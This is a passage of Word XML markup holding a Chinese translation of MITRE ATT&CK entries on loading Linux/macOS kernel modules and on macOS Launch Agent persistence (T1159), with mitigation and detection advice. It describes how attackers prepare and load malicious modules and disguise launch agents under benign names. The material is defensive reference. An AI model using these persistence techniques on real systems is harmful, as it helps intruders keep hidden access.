                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F13F47B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B96D6CB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LKM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>通常加载到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>/lib/modules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>中，并且自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>内核版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>起具有扩展名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>.ko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>（“内核对象”）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BB07DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>许多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LKM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>头文件（特定于目标内核）才能正确编译。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>这些通常通过操作系统包管理器获得，并像普通包一样安装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56293BCB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者可能会在加载恶意模块之前在目标系统上运行这些命令，以确保它被正确编译。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E7AF6B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的系统上可以通过运行此命令来完成：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>apt-get install linux-headers-$(uname -r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01415917" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>RHEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>CentOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的系统上可以通过运行此命令来完成：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>yum install kernel-devel-$(uname -r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43038A31" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>可以通过监视以下命令来检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>系统上的加载，卸载和操作模块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>modprobe insmod lsmod rmmod modinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D95489" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>，监视</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>kextload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>命令的执行并与其他未知或可疑活动相关联。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218D162A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007E30B0" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C980F9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008411D6" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380E97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>启动代理</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="16D42574" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="309BE961" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> T1159</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685504EE" w14:textId="1743EC16" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20AAFE5F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AED492B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C1CDB79" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A2891" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1C9D87" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007A2891">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007A2891">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63AD8BB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="13D5A447" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的开发人员文档，当用户登录时，将启动一个按用户启动的进程，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/System/Library/LaunchAgent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0349D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Library/LaunchAgents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>$HOME/Library/LaunchAgents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中找到属性列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>加载每个按需启动的用户代理的参数。这些启动代理指向将启动的可执行文件的属性列表文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C057F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>对手可以安装一个新的启动代理，在登录时通过使用启动或启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>ctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>进行执行，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>加载到适当的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:tgtFrame="_blank" w:history="1"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可以使用相关操作系统或良性软件中的名称来伪装代理名称。启动代理是使用用户级权限创建的，并在用户登录时使用用户的权限执行。它们可以设置为在特定用户登录（在特定用户的目录结构中）或任何用户登录（需要管理员权限）时执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B9A7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3570"/>
        <w:gridCol w:w="6166"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="6EBE982D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3570" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="07A1FCC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6166" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C6B62EA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00800DCC" w14:paraId="43BC79EA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E0E937" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00800DCC" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:spacing w:after="312"/>
            </w:pPr>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6166" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F5FA7FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00800DCC" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:spacing w:after="312"/>
            </w:pPr>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element-highlighted"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00800DCC">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>使用组策略创建启动代理的能力</w:t>
            </w:r>
            <w:r w:rsidRPr="00800DCC">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="309DDA27" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C6E355" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件和实用程序（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective-see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的敲击操作应用程序）监视启动代理创建。启动代理还需要磁盘上的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
